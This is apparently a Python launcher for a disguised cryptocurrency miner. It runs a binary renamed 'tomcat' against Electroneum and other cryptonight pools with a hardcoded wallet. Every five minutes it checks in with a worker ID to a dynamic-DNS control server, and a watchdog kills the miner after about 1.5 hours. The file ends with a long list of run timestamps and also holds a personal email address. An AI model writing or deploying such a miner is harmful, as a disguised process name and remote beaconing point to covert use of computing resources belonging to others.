import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:52:07.538942
#2018-02-17 17:39:07.579522
#2018-02-17 19:27:01.860832
#2018-02-17 21:16:05.325260
#2018-02-17 23:00:09.200316
#2018-02-18 00:46:08.390734
#2018-02-18 02:35:01.499779
#2018-02-18 04:22:01.639508
#2018-02-18 06:12:04.102991
#2018-02-18 08:02:01.584729
#2018-02-18 09:49:07.519360
#2018-02-18 11:36:06.421668
#2018-02-18 13:21:06.270643
#2018-02-18 15:11:07.258164
#2018-02-18 16:59:06.781531
#2018-02-18 18:52:03.194792
#2018-02-18 20:39:02.079081
#2018-02-18 22:25:05.596310
#2018-02-19 00:14:06.095016
#2018-02-19 02:00:08.094686
#2018-02-19 03:47:03.939568
#2018-02-19 05:33:06.586339
#2018-02-19 07:21:08.013904
#2018-02-19 09:11:07.007622
#2018-02-19 11:01:06.357755
#2018-02-19 12:49:09.123754
#2018-02-19 14:36:09.333436
#2018-02-19 16:24:08.180357
#2018-02-19 18:10:12.420840
#2018-02-19 19:58:05.438755
#2018-02-19 21:47:04.267370
#2018-02-19 23:32:06.788752
#2018-02-20 01:19:06.413573
#2018-02-20 03:09:06.828481
#2018-02-20 04:56:05.704491
#2018-02-20 06:40:08.331394
#2018-02-20 08:25:04.013440
#2018-02-20 10:10:03.199508
#2018-02-20 11:54:01.811805
#2018-02-20 13:41:10.763614
#2018-02-20 15:25:12.765424
#2018-02-20 17:12:13.340426
#2018-02-20 19:02:08.128714
#2018-02-20 20:52:07.477429
#2018-02-20 22:38:07.312747
#2018-02-21 00:19:07.321466
#2018-02-21 02:06:07.735065
#2018-02-21 03:54:05.574455
#2018-02-21 05:41:06.427935
#2018-02-21 07:30:11.098082
#2018-02-21 09:15:09.285212
#2018-02-21 11:03:05.030039
#2018-02-21 12:51:04.864676
#2018-02-21 14:39:03.984958
#2018-02-21 16:25:13.383772
#2018-02-21 18:16:01.571611
#2018-02-21 20:01:04.552073
#2018-02-21 21:49:07.739865
#2018-02-21 23:36:01.396245
#2018-02-22 01:24:05.453334
#2018-02-22 03:12:06.623987
#2018-02-22 04:58:04.841698
#2018-02-22 06:43:05.102856
#2018-02-22 08:31:04.506921
#2018-02-22 10:19:04.077960
#2018-02-22 12:04:08.849547
#2018-02-22 13:50:14.113126
#2018-02-22 15:39:07.170424
#2018-02-22 17:24:07.977477
#2018-02-22 19:13:05.371575
#2018-02-22 21:05:05.412790
#2018-02-22 22:49:03.595634
#2018-02-23 00:37:07.834097
#2018-02-23 02:23:07.630541
#2018-02-23 04:13:07.455164
#2018-02-23 05:59:01.561233
#2018-02-23 07:31:07.308881
#2018-02-23 09:35:04.195412
#2018-02-23 11:17:09.377209
#2018-02-23 12:37:02.081419
#2018-02-23 14:05:08.933646
#2018-02-23 15:42:10.363160
#2018-02-23 17:13:04.821766
#2018-02-23 18:47:07.482450
#2018-02-23 20:22:01.662646
#2018-02-23 21:55:07.769675
#2018-02-23 23:33:01.451365
#2018-02-24 01:06:07.740903
#2018-02-24 02:45:08.651490
#2018-02-24 04:23:05.302881
#2018-02-24 06:09:07.594524
#2018-02-24 07:56:04.930965
#2018-02-24 09:41:06.059050
#2018-02-24 11:37:05.413628
#2018-02-24 13:27:03.823826
#2018-02-24 15:15:09.027795
#2018-02-24 17:05:04.164848
#2018-02-24 18:56:01.762202
#2018-02-24 20:43:01.284975
#2018-02-24 22:57:01.414301
#2018-02-25 02:14:05.501923
#2018-02-25 06:01:05.667157
#2018-02-25 11:39:08.159749